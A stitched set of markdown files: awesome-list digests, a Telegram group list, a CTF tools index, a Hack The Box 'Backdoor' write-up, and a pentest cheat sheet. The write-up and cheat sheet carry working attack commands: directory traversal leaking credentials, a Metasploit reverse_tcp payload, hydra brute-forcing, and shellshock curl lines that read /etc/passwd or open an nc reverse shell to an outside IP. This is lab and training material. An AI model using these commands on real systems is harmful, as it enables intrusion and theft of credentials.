* [Vulpes (⭐116)](https://github.com/fsprojects/Vulpes) - Deep belief and deep learning implementation written in F# and leverages CUDA GPU execution with Alea.cuBase.
## [30. Bots](/content/hackerkid/bots/week/README.md)
### Tools For Building Bots
* [Dialogflow](https://dialogflow.com/) - Build natural and rich conversational experiences.
## [31. Awesome Mqtt](/content/hobbyquaker/awesome-mqtt/week/README.md)
### Tools
* [moxy (⭐23)](https://github.com/jvermillard/moxy) - A Golang MQTT proxy providing useful output traces to monitor and troubleshoot your MQTT communications.
* [mqtt-shell (⭐16)](https://github.com/pidster-dot-org/mqtt-shell) - A simple interactive shell for MQTT.
### Smart Home Hardware Interfaces / Firmwares for ESP based Devices
* [homeeToMqtt (⭐10)](https://github.com/odig/homeeToMqtt) - Bidirectional Interface between homee and MQTT.
## [32. Awesome React Native](/content/jondot/awesome-react-native/week/README.md)
### Assorted
* [React and React Native State Museum](https://hackernoon.com/the-react-state-museum-a278c726315)
## [33. Awesome Vapor](/content/vapor-community/awesome-vapor/week/README.md)
### Libraries
* ![v3](https://github.com/vapor-community/awesome-vapor/raw/main/img/vapor-3.png) [Ferno (⭐52)](https://github.com/vapor-community/ferno) – Vapor Firebase Realtime database provider.
* ![v3](https://github.com/vapor-community/awesome-vapor/raw/main/img/vapor-3.png) [Local Storage (⭐3)](https://github.com/gperdomor/local-storage) – Storage driver using local filesystem.
* ![v3](https://github.com/vapor-community/awesome-vapor/raw/main/img/vapor-3.png) [Vapor reCAPTCHA (⭐11)](https://github.com/gotranseo/vapor-recaptcha) – Validate Google reCAPTCHAs using Vapor.
* ![v3](https://github.com/vapor-community/awesome-vapor/raw/main/img/vapor-3.png) [Vapor Request Storage (⭐7)](https://github.com/skelpo/vapor-request-storage) – A replacement for `request.storage` which was available in Vapor 1 & 2.
### Tools
* [Ice (⭐372)](https://github.com/jakeheis/Ice) – A developer friendly package manager for Swift; 100% compatible with Swift Package Manager.
### Open-source Projects / Videos
* ![v3](https://github.com/vapor-community/awesome-vapor/raw/main/img/vapor-3.png) [User Manager Service (⭐69)](https://github.com/skelpo/UserManager) – A small, useful user manager made for production application setups.
## [34. Awesome Broadcasting](/content/ebu/awesome-broadcasting/week/README.md)
### Metadata
* [SDPoker (⭐33)](https://github.com/Streampunk/sdpoker) - CLI tool and library for testing SMPTE ST2110 SDP files.
## [35. Awesome Security](/content/sbilly/awesome-security/week/README.md)
### Other Awesome Lists / Other Security Awesome Lists
* [Awesome Container Security (⭐10)](https://github.com/kai5263499/container-security-awesome) - A curated list of awesome resources related to container building and runtime security
## [36. Awesome Swift](/content/matteocrippa/awesome-swift/week/README.md)
### Animation
* [SpriteKitEasingSwift (⭐112)](https://github.com/craiggrummitt/SpriteKitEasingSwift) - Better Easing for SpriteKit.
### Core Data
* [SugarRecord (⭐2.1k)](https://github.com/modo-studio/SugarRecord) - Helps with Core Data and Realm.
### Images / Barcode
* [BlockiesSwift (⭐58)](https://github.com/Boilertalk/BlockiesSwift) - Unique blocky identicons/profile picture generator.
* [ImageDetect (⭐301)](https://github.com/Feghal/ImageDetect) - Detect and crop faces, barcodes and texts in image with iOS 11 Vision API.
### Logging / Barcode
* [TraceLog (⭐51)](https://github.com/tonystone/tracelog) :penguin: - Dead Simple: logging the way it's meant to be! Runs on iOS, macOS, and Linux.
### Webserver / Barcode
* [Curassow (⭐397)](https://github.com/kylef-archive/Curassow) :penguin: - HTTP server using the pre-fork worker model.
### Scripting / Barcode
* [Swift for Scripting (⭐234)](https://github.com/artemnovichkov/Swift-For-Scripting) - A hand-curated collection of useful and informative scripting material.
### Text / Barcode
* [Croc (⭐129)](https://github.com/JKalash/Croc) - A lightweight Emoji parsing and querying library.
### Template / Barcode
* [Stencil (⭐2.2k)](https://github.com/stencilproject/Stencil) - Simple and powerful template language.
### Transition / Barcode
* [EasyTransitions (⭐1.7k)](https://github.com/marcosgriselli/EasyTransitions) - A simple way to create custom interactive UIViewController transitions.
## [37. Awesome Css Learning](/content/micromata/awesome-css-learning/week/README.md)
### CSS References
* [Can I use](https://caniuse.com) - Interactive browser support tables for CSS (and HTML5).
### Fundamental concepts
* [The cascade](https://developer.mozilla.org/en-US/docs/Web/CSS/Cascade) - This article explains what the cascade is and how this affects you.
* [Specificity and inheritance](https://www.smashingmagazine.com/2010/04/css-specificity-and-inheritance/) - Understanding specificity and inheritance is important to master CSS. This article will help.
* [CSS Box Model](https://developer.mozilla.org/en-US/docs/Learn/CSS/Introduction_to_CSS/Box_model) - An article explaining the foundation of layout on the web.
* Also have a look at the detailed information about the [box-sizing](https://css-tricks.com/box-sizing/) property.
### Selectors
* [Advanced CSS Selectors](https://www.smashingmagazine.com/2009/08/taming-advanced-css-selectors/) - Level up your knowledge. From attribute selectors to CSS3 pseudo classes.
### Custom properties (aka CSS variables)
* [CSS Variables: Why Should You Care?](https://developers.google.com/web/updates/2016/02/css-variables-why-should-you-care) - A short introduction to CSS variables.
* [Locally Scoped CSS Variables: What, How, and Why](https://una.im/local-css-vars/) - Describes the advantages of locally scoped CSS variables.
* [Using CSS variables correctly](https://www.madebymike.com.au/writing/using-css-variables/) - Patterns and anti-patterns for using CSS variables.
* [Everything you need to know about CSS Variables](https://medium.freecodecamp.org/everything-you-need-to-know-about-css-variables-c74d922ea855) - In depth article going beyond the basics of CSS Variables using real-world examples.
* [Getting Reactive with CSS](https://www.youtube.com/watch?v=4IRPxCMAIfA) - Mindblowing talk about the possibilities of the combination of CSS variables and functional reactive programming in JavaScript.
### Layout
* [Learn CSS Layout](http://book.mixu.net/css) - Learn about CSS layout techniques in 5 chapters.
* [Laying Out The Future With Grid And Flexbox](https://www.youtube.com/watch?v=hj355PRbwSQ) - Introduction of a new layout system encompassing Flexbox, CSS Grid and the Box Alignment Module.
### Layout / Classic layouting
* [Floats](https://tympanus.net/codrops/css_reference/float/) - In depth information about how to use (and clear) floats.
* [Positioning Types](https://scotch.io/bar-talk/5-things-you-might-not-know-about-the-css-positioning-types) - A closer look at a few little-known things related to the CSS positioning layout method.
* [inline-block](https://iamsteve.me/blog/entry/inline_block) - Shows in which cases it makes sense to use the display property `inline-block` for layouting.
### Layout / Flexbox
* [Flexbugs (⭐13k)](https://github.com/philipwalton/flexbugs) - Community-curated list of flexbox issues and cross-browser workarounds for them.
* [Flexbox Zombies](https://flexboxzombies.com) - A training course driven by a storyline where you use Flexbox and a crossbow to hunt zombies.
### Layout / Grid
* [Grid Garden](https://cssgridgarden.com) - Lovely game where you write CSS code to grow your carrot garden.
### Animation / Grid
* [CSS 3D transforms](https://3dtransforms.desandro.com) - Multi page tutorial with examples like card flip and carousel effects.
* [CSS Animation for Beginners](https://robots.thoughtbot.com/css-animation-for-beginners) - Imparts the concepts of CSS animations with keyframes.
* [animatable](http://leaverou.github.io/animatable/) - Nice little page demonstrating which CSS properties are animatable.
## [38. Awesome Recursion Schemes](/content/passy/awesome-recursion-schemes/week/README.md)
### Implementations / Hylomorphisms in the Wild
* [dada (⭐58)](https://github.com/sellout/dada) for Dhall - a library for recursion
schemes in Dhall.
## [39. Awesome Geek Podcasts](/content/ayr-ton/awesome-geek-podcasts/week/README.md)
### In English
* [Elixir Outlaws](https://elixiroutlaws.com) - Panel discussions of topics in and around Elixir development.
## [40. Awesome Dotnet](/content/quozd/awesome-dotnet/week/README.md)
### Assets
* [Bundle Transformer (⭐120)](https://github.com/Taritsyn/BundleTransformer) - Modular extension for [Microsoft ASP.NET Web Optimization Framework](https://www.nuget.org/packages/Microsoft.AspNet.Web.Optimization). Its modules supports LESS, Sass, CoffeeScript, TypeScript, Mustache, Handlebars, Autoprefixer along with a bunch of different JS and CSS minifiers.
### Compilers, Transpilers and Languages
* [Mond (⭐311)](https://github.com/Rohansi/Mond) - A dynamically typed scripting language written in C# with a REPL, debugger, and simple embedding API.
### Compression
* [DotNetZip.Semverd (⭐499)](https://github.com/haf/DotNetZip.Semverd) - An open-source project that delivers a .NET library for handling ZIP files, and some associated tools. (fork of [**Unmaintained** DotNetZip](https://archive.codeplex.com/?p=dotnetzip))
### Cryptography
* [HashLib](https://archive.codeplex.com/?p=hashlib) - HashLib is a collection of nearly all hash algorithms you've ever seen, it supports almost everything and is very easy to use
### ETL
* [Cinchoo ETL (⭐657)](https://github.com/Cinchoo/ChoETL) - ETL Framework for .NET (Read / Write CSV, Flat, Xml, JSON, Key-Value formatted files)
* [Reactive ETL](https://archive.codeplex.com/?p=reactiveetl) - Reactive ETL is a rewrite of Rhino ETL using the reactive extensions for .NET
### Event aggregator and messenger
* [Xer.Cqrs (⭐98)](https://github.com/XerProjects/Xer.Cqrs) - A simple library for creating applications based on the CQRS pattern with support for attribute routing and hosted handlers. Developed in C# targeting .NET Standard 1.0.
### GUI
* [Office Ribbon (⭐680)](https://github.com/RibbonWinForms/RibbonWinForms) - A library that implements MS Office Ribbon for WinForms.
### HTTP
* [Refit (⭐7.2k)](https://github.com/reactiveui/refit) - The automatic type-safe REST library for Xamarin and .NET
### Minification
* [Microsoft Ajax Minifier](https://archive.codeplex.com/?p=ajaxmin) - Contains JS and CSS minifiers which have a highest performance, because its have been specifically designed for .NET. Optionally produce Source Maps for JS code.
### Misc
* [MSBuild ILMerge task](https://archive.codeplex.com/?p=ilmergemsbuild) - MSBuild ILMerge task is a NuGet package allows you to use the famous ILMerge utility in automated builds and/or Visual Studio projects.
### MVVM
* [MVVM Light Toolkit (⭐1.2k)](https://github.com/lbugnion/mvvmlight) - The main purpose of the toolkit is to accelerate the creation and development of MVVM applications in WPF, Silverlight, Windows Store (RT) and for Windows Phone
### Office
* [EPPlus (⭐3.7k)](https://github.com/JanKallman/EPPlus) - EPPlus is a .NET library that reads and writes Excel 2007/2010 files using the Open Office XML format (xlsx).
### PDF
* [WkhtmlToPdf (⭐263)](https://github.com/codaxy/wkhtmltopdf) - C# wrapper around wkhtmltopdf console utility. Allow to generate preety PDF using HTML and CSS.
### Reactive Programming
* [Rx.NET (⭐6k)](https://github.com/dotnet/reactive) - The Reactive Extensions (Rx) is a library for composing asynchronous and event-based programs using observable sequences and LINQ-style query operators
### Testing
* [NCrunch](https://www.ncrunch.net/) - An automated continuous & concurrent testing tool for Visual Studio. **\[$]**
### Visual Studio Plugins
* [VSColorOutput](https://marketplace.visualstudio.com/items?itemName=MikeWard-AnnArbor.VSColorOutput) - Color highlighting for Build, Find and Debug output windows. Custom match patterns and colors can be added.
### WebSocket
* [WebSocket4NET](https://archive.codeplex.com/?p=websocket4net) - WebSocket client for .NET 2.0+, Xamarin, Mono, Silverlight, Windows Phone, & WinRT
* [Crossertech](https://crosser.io/) - Provides a great set of tools for you to build real-time applications on the Microsoft.NET plattform and much more. **\[$]**
* [WampSharp (⭐382)](https://github.com/Code-Sharp/WampSharp) - A C# implementation of [The Web Application Messaging Protocol](https://wamp-proto.org/) - a protocol that provides messaging patterns of Remote Procedure Calls and Publish/Subscribe over WebSockets.
---
- Prev: [May 14 - May 20, 2018](/content/2018/20/README.md)
- Next: [Apr 30 - May 06, 2018](/content/2018/18/README.md) |
<p align="center"><img src="img/banner.png" alt="Banner"></img></p>
<p align="center">Machine creator: <a href="https://app.hackthebox.com/profile/79623">hkabubaker17</a></p>
[![f4T1H21](https://www.hackthebox.eu/badge/image/184235)](https://app.hackthebox.eu/profile/184235)
<br>
<a href="https://www.buymeacoffee.com/f4T1H21">
<img src="https://raw.githubusercontent.com/f4T1H21/f4T1H21/main/support.png" height="40" alt="Support">
</img>
</a>
<br>
---
# Reconnaissance
### Nmap result
```console
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-title: Backdoor – Real-Life
1337/tcp open waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## `80/tcp`
Let's run a `wpscan`:
```console
┌──(root💀f4T1H)-[~/hackthebox/backdoor]
└─# wpscan --url http://backdoor.htb/ --detection-mode aggressive --plugins-detection aggressive --plugins-version-detection aggressive -e vp,vt,tt,cb,dbe,u,m --api-token <Removed>
...
[+] ebook-download
| Location: http://backdoor.htb/wp-content/plugins/ebook-download/
| Last Updated: 2020-03-12T12:52:00.000Z
| Readme: http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
| [!] The version is out of date, the latest version is 1.5
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/ebook-download/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: Ebook Download < 1.2 - Directory Traversal
| Fixed in: 1.2
| References:
| - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10924
|
| Version: 1.1 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
...
```
## Directory Traversal
https://www.exploit-db.com/exploits/39575
`../../wp-config.php` has MySQL credentials obviously but we can't use them as there's no externally listening mysql service on remote host.
```console
┌──(root💀f4T1H)-[~/hackthebox/backdoor]
└─# curl -s http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php | grep 'DB_' | head -n 4
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpressuser' );
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );
define( 'DB_HOST', 'localhost' );
```
```console
┌──(root💀f4T1H)-[~/hackthebox/backdoor]
└─# curl -s http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd | grep -P '100\d'
user:x:1000:1000:user:/home/user:/bin/bash
```
Tried mysql passord to ssh but no avail.<br>
Considering this is a path traversal and not LFI, I don't think there's an RCE, apache log poisoning or header injection moves forward from this point.<br>
Chances are we can enumerate network and processes on the remote host.<br>
## Enumerating TCP listening ports through `/proc/net/tcp`
```console
┌──(root💀f4T1H)-[~/hackthebox/backdoor]
└─# curl -s http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/net/tcp | sed -e 's/^\/proc\/net\/tcp\/proc\/net\/tcp\/proc\/net\/tcp//g' -e 's/<script>window.close()<\/script>$//g'
sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode
0: 0100007F:8124 00000000:0000 0A 00000000:00000000 00:00000000 00000000 113 0 34640 1 0000000000000000 100 0 0 10 0
1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000 113 0 34642 1 0000000000000000 100 0 0 10 0
2: 3500007F:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000 101 0 32150 1 0000000000000000 100 0 0 10 0
3: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 33858 1 0000000000000000 100 0 0 10 0
4: 7D0B0A0A:A5DC 01010101:0035 02 00000001:00000000 01:000002D4 00000003 101 0 217606 2 0000000000000000 800 0 0 1 7
5: 7D0B0A0A:0539 0F0E0A0A:9E48 01 00000000:00000000 02:00096761 00000000 1000 0 171898 2 0000000000000000 26 4 30 10 7
┌──(root💀f4T1H)-[~/hackthebox/backdoor]
└─# echo $((16#0539))
1337
```
In the last line, we can see a listening process which is done by `user`, converting its listening port number from hexadecimal to decimal gives us `1337`.
## Brute forcing running processes /proc/{PID}
Here's the script I wrote to brutefore commands for relative Process IDs.
___Attention___: _I recommend you to reset the box before running this script as the more machine stays alive, the bigger PIDs become._
#### brute.py
```python
#!/usr/bin/env python3
import requests
import re
url = 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl='
for i in range(0, 100000):
try:
path = f"/proc/{i}/cmdline"
pattern = r"({}){}(.*)<script>window\.close\(\)</script>".format(path, '{3}')
r = requests.get(url+path)
match = re.match(pattern, r.content.decode('utf-8'))
cmd = match.group(2)
if cmd:
print(f"PID {i} {cmd}")
except KeyboardInterrupt:
exit()
except Exception as e:
print(f"Program crashed because of:\n{e}")
exit()
```
Time for a coffee break ☕
After some time, I noticed a process related with port `1337/tcp`.
```console
PID 879 /bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
```
Here we managed to find out what's actually going on on `tcp/1337`, there's a `gdbserver` listening!
# Foothold: GDB Server Remote Payload Execution
There's an msf module for the exploit, let's try it.
```console
msf6 > use exploit/multi/gdb/gdb_server_exec
msf6 exploit(multi/gdb/gdb_server_exec) > set target 1
msf6 exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > set rhost 10.10.11.125
msf6 exploit(multi/gdb/gdb_server_exec) > set rport 1337
msf6 exploit(multi/gdb/gdb_server_exec) > set lhost tun0
msf6 exploit(multi/gdb/gdb_server_exec) > exploit
```
# Privilege Escalation: Screen Cronjob
Enumerating running processes again gives us a `cronjob` which is a `while` loop again!
```console
root 811 808 0 12:48 ? 00:00:00 \_ /usr/sbin/CRON -f
root 844 811 0 12:48 ? 00:00:00 \_ /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
root 25736 844 0 13:20 ? 00:00:00 \_ sleep 1
```
#### find
- `-empty`: Is a test that returns `true` if there's no file or empty file.
- `-exec`: Executes, yes.
#### screen
is a utility that provides the ability of using multiple shell sessions.
- `-dmS`: Starts screen session in detached mode as daemon.
- `root`: The name of the session started.
So here we can get root privileges if we attach that daemonized detached screen session.
We can use either `screen -dr root/root` or `screen -x root/root`, both will work.
```console
root@Backdoor:~# cut -c1-21 root.txt
c1109f567183dfac2b1fa
```
---
# References
|__`Wordpress Plugin eBook Download 1.1 Directory Traversal`__|__https://www.exploit-db.com/exploits/39575__|
|:-|:-|
<br>
___─ Written by f4T1H ─___ |
# CTF Online Tools
[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/dwyl/esta/issues)
Repository to index interesting [Capture The Flag](https://en.wikipedia.org/wiki/Capture_the_flag#Computer_securit) online tools.
## Platforms
https://ctftime.org/
https://www.hackthebox.eu/
https://ctflearn.com/
https://atenea.ccn-cert.cni.es/
https://unaalmes.hispasec.com
https://www.root-me.org/
https://ctf365.com/
https://247ctf.com/
## Wikis
https://wiki.devploit.dev/
## Web
https://requestbin.fullcontact.com/
https://reqbin.com/
https://beautifier.io/
http://jsonviewer.stack.hu/
https://pentest-tools.com/
https://tableconvert.com/
https://www.rdtoc.com/tools/jmespath
https://www.rdtoc.com/tools/jsonpath
## Reversing
https://onlinedisassembler.com/
http://www.javadecompilers.com/
https://www.hybrid-analysis.com/
https://any.run/
## Cryptography
https://gchq.github.io/CyberChef/
https://www.dcode.fr/tools-list#cryptography
http://multiencoder.com/
https://hexed.it/
https://md5online.es/
https://hashgenerator.de/
https://cryptii.com/
https://geocaching.dennistreysa.de/multisolver/index.html
https://quipqiup.com/
http://www.crypo.com/
http://www.malbolge.doleczek.pl/
http://rumkin.com/tools/cipher/
https://summersidemakerspace.ca/projects/enigma-machine/
https://www.guballa.de/vigenere-solver
## Steganography
https://futureboy.us/stegano/
http://exif.regex.info/exif.cgi
https://incoherency.co.uk/image-steganography/
https://yndi.github.io/darkjpeg/
https://morsecode.scphillips.com/labs/audio-decoder-adaptive/
https://www.bertnase.de/npiet/npiet-execute.php
## OSINT
https://inteltechniques.com/menu.html
https://ciberpatrulla.com/links/
https://osintframework.com/
## Write-ups
https://ctf.courgettes.club/
https://ctftime.org/writeups
https://github.com/ctfs
### Contributors
[@j0n3](https://github.com/j0n3)
[@Fechin](https://github.com/Fechin)
|
## Enum
### nmap
```
masscan -p1-65535 10.1.1.1 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.1.1.1
```
-sT TCP </br>
-sS Syn </br>
-sU UDP </br>
LFI php source code
------
```http://10.10.10.122/dev/index.php?view=php://filter/convert.base64-encode/resource=index```
### LFI to shell
#### General Idea: chain LFI with write access
#### inject to user agent, then LFI to /var/log
```
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access.log
others apache realated files:
/usr/local/etc/apache22/httpd.conf
/etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf
/usr/local/etc/apache22/httpd.conf
/etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf
```
#### LFI /proc/self/environ /proc/self/fd/
[https://highon.coffee/blog/lfi-cheat-sheet/](https://highon.coffee/blog/lfi-cheat-sheet/)
[https://www.exploit-db.com/papers/12992](https://www.exploit-db.com/papers/12992)
### Bruteforce
```
hydra -L /opt/seclist/Usernames/top-usernames-shortlist.txt -P cewl2 10.11.1.39 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=180&User=^USER^&Password=^PASS^:F=failed" -I -V
hydra -C tomcat-betterdefaultpasslist.txt -s 80 -f 10.11.1.237 http-get /webdav/ -V
hydra -l role -P tomcat-betterdefaultpasslist.txt -e ns -t 15 -f -s -vV 10.10.10.101 -s 8080 http-get /
use -C for USER:PASS password file format
```
### TEMPLATE:
hydra -l [USERNAME] -P [WORDLIST] [TARGET] -s [Port] http-post-form "[URI-PATH-HERE] : [POST data from burp] : [Failed word]" -I -V
```
medusa -u root -P darkweb2017-top1000.txt -h 10.14.1.136 -M http -m DIR:/phpmyadmin/ -T 10
medusa -u root -P /usr/share/wordlists/rockyou.txt -h 10.14.1.11 -M mysql -n 3306 -T 16
```
### CMS stuff
```
wpscan --url $ip -e ap,tt,vt,u
droopescan scan drupal -u http://10.11.1.49/ -t 32 --enumerate ap
cadaver 192.168.1.101/webdav
```
#### shellshock
```
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.11.1.71/cgi-bin/admin.cgi
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.39 1234 >/tmp/f'" http://10.11.1.71/cgi-bin/admin.cgi
``` |
# Awesome Indonesia Telegram Groups
A list of awesome Indonesian groups related to a programming language on Telegram.
<details open>
<summary>
## List
</summary>
- [Blockchain](#blockchain)
- [Cloud Computing Services](#cloud-computing-services)
- [Cloud Infrastructure](#cloud-infrastructure)
- [Data Playground](#data-playground)
- [Database](#database)
- [Design](#design)
- [Development](#development)
- [DevOps](#devops)
- [Firebase](#firebase)
- [FreeBSD](#freebsd)
- [Game Development](#game-development)
- [Internet of Things (IoT)](#internet-of-things-iot)
- [iOS](#ios)
- [Jokes](#jokes)
- [Linux](#linux)
- [Lowongan Kerja](#lowongan-kerja)
- [macOS](#macos)
- [Microservice](#microservice)
- [Mikrotik](#mikrotik)
- [Office](#office)
- [Open Source](#open-source)
- [Programming Language](#programming-language)
- [Quantum](#quantum)
- [Science](#science)
- [Security](#security)
- [Software Quality Assurance (SQA)](#software-quality-assurance-sqa)
- [Startup](#startup)
- [Tentang Telegram](#tentang-telegram)
- [Tips](#tips)
- [Windows](#windows)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Blockchain
</summary>
- [Friends with Blockchain](https://t.me/friendswithblockchain)
- [Hyperledger (Enterprise) Blockchain Indonesia](https://t.me/hl_id)
- [Nusantara Chain (Nuchain)](https://t.me/nusantarachain)
- [Official Stacks Chapter Indonesia](https://t.me/stacksindonesia)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Cloud Computing Services
</summary>
- [#JuaraGCP](https://t.me/JuaraGCP)
- [AWS Analytics User Group Indonesia](https://t.me/AWSDataUserGroupID)
- [AWS User Group Indonesia](https://t.me/AWSUserGroupID)
- [Azure ID](https://t.me/azureindo)
- [GCP User Group Indonesia](https://t.me/GCPUserID)
- [Google Cloud Platform Indonesia](https://t.me/GCP_ID)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Cloud Infrastructure
</summary>
- [OpenStack Indonesia](https://t.me/openstackindo)
- [Ceph.id](https://t.me/cephid)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Data Playground
</summary>
- [Artificial Intelligence Indonesia](https://t.me/ArtificialIntelligence_Indonesia)
- [Asosiasi Ilmuwan Data Indonesia (AIDI)](https://t.me/aidindonesia)
- [Big Data Official Group](https://t.me/idbigdata)
- [Business Intelligence Indonesia](https://t.me/businessintelligenceID)
- [Data Scientist Indonesia](https://t.me/datascienceindonesia)
- [Indonesia AI Forum](https://t.me/IAIForum)
- [Machine Learning ID Lombok](https://t.me/machinelearninglombok)
- [Machine Learning ID](https://t.me/machinelearningid)
- [Natural Language ID](https://t.me/nlp_lounge)
- [PyTorch Indonesia](https://t.me/pytorchid)
- [Scrape ID](https://t.me/ScrapeID)
- [Tableau Professionals](https://t.me/TableauProfessionals)
- [TensorFlow Indonesia](https://t.me/tensorflowid)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Database
</summary>
- **Microsoft SQL Server**
- [SQL Server Indonesia](https://t.me/sqlserverid)
- **MongoDB**
- [MongoDB Indonesia](https://t.me/MongoDB_ID)
- [MongoDB User Group](https://t.me/mongo_db)
- **MySQL**
- [MySQL & MariaDB Indonesia](https://t.me/mysqlid)
- **PostgreSQL**
- [PostgreSQL Indonesia](https://t.me/postgresql_id)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Design
</summary>
- [GimpScape ID](https://t.me/gimpscape)
- [Kumpulan Grub Adobe](https://t.me/grupadobelainnya)
- [Photoshop Community ID](https://t.me/photoshopcommunity_id)
- [Sinau Desain](https://t.me/SinauDesain)
- [Belajar Desain Grafis](https://t.me/belajarngedesain)
- [UI/UX Indonesia](https://t.me/UiuxIndo)
- [Uplabs Indonesia](https://t.me/uplabsindonesia)
- [UXiD Lombok](https://t.me/uxidlombok)
</details>
[back to the 🔝](#list)
<details>
<summary>
### Development
</summary>
- [[c]oretan Script](https://t.me/cScript)
- [Belajar Coding Bareng](https://t.me/BelajarCoding)
- [Belajar Ngoding](https://t.me/belajarngodingbareng)
- [Belajar GNU R Indonesia](https://t.me/GNURIndonesia)
- [Belajar Golang MariaDB](https://t.me/BelajarGolangMariaDB)
- [Belajar HTML](https://t.me/belajarhtmlcss)
- [Bogor Developers](https://t.me/BogorDev)
- [Borneo Koding](https://t.me/borneokoding)
- [Bot Telegram API](https://t.me/TgBotID)
- [Channel Otodidak Pemrograman](https://t.me/otodidak_ngoding)
- [Cilegon Developer](https://t.me/cilegondev)
- [CirebonDev](https://t.me/crbdev)
- [codingfess](https://t.me/codingfess)
- [Femalegeek](https://t.me/femalegeek)
- [Free Kelas Github](https://t.me/freekelasgithub)
- [Frontend Developer Indonesia](https://t.me/FrontEndID)
- [Gresik Dev](https://t.me/gresikdev)
- [IAM Indonesia](https://t.me/IAMIndonesia)
- [IDStack](https://t.me/idstack)
- [Info Event Teknologi](https://t.me/eventteknologi)
- [Infotech Programmer](https://t.me/infotechprogrammer)
- [IT Nusantara](https://t.me/ITNusantara)
- [JavaScript ID](https://t.me/js_id)
- [JemberDev](https://t.me/DjemberDev)
- [Kabayan Coding](https://t.me/kabayan_coding)
- [Kelas Mobile Malang](https://t.me/KelasMobileMalang)
- [Komunitas Backend Developer](https://t.me/BackEndID)
- [Komunitas Belajar Koding](https://t.me/komunitasbk)
- [Komunitas RPA Indonesia](https://t.me/KomunitasRPAIndonesia)
- [Kongkow IT Medan](https://t.me/kongkowITMedan)
- [Kongkow IT Pekanbaru](https://t.me/kongkowITpekanbaru)
- [Kotakode](https://t.me/kotakodebetachat)
- [Kulkul.tech Community - Meetup and Dev Community](https://t.me/kulkultech)
- [Odoo - OpenERP Indonesia](https://t.me/odooindonesia)
- [Pasuruan Dev](https://t.me/pasuruandev)
- [Programmer Lokal](https://t.me/programmerlokal)
- [Programmer Semarang Raya](https://t.me/programersemarangraya)
- [RantauDev](https://t.me/rantaudev)
- [React Native ID](https://t.me/reactnativeindo)
- [ReactJS Indonesia](https://t.me/react_idn)
- [Roacode](https://t.me/Roacode)
- [Santren Koding](https://t.me/santrenkoding)
- [SARCCOM Universe](https://t.me/sarccomuniverse)
- [Sidoarjo Dev](https://t.me/sidoarjodev)
- [SinauDev - Sinau Development](https://t.me/sinaudev)
- [Software Engineer Indonesia](https://t.me/soft_eng_id)
- [SparkAR Indonesia](https://t.me/sparkarindonesia)
- [Surabaya Dev](https://t.me/surabayadev)
- [Tailwind Indonesia](https://t.me/TailwindID)
- [LamonganDev](https://t.me/lamongandev)
- [Taman Kode-Kode](https://t.me/tamankodekode)
- [Tech in Asia Dev Community](https://t.me/TIAdevcommunity)
- [Teknologi Umum](https://t.me/teknologi_umum_v2)
- [Typescript Indonesia](https://t.me/TypescriptIndonesia)
- [Vim Indonesia](https://t.me/VimID)
- [WordPress](https://t.me/idwordpress)
</details>
[back to the 🔝](#list)
<details>
<summary>
### DevOps
</summary>
- [Ansible Indonesia](https://t.me/ansibleid)
- [Cloud Computing Indonesia](https://t.me/cloudcomputingindonesia)
- [Docker Indonesia](https://t.me/dockeridn)
- [IDDevOps](https://t.me/IDDevOps)
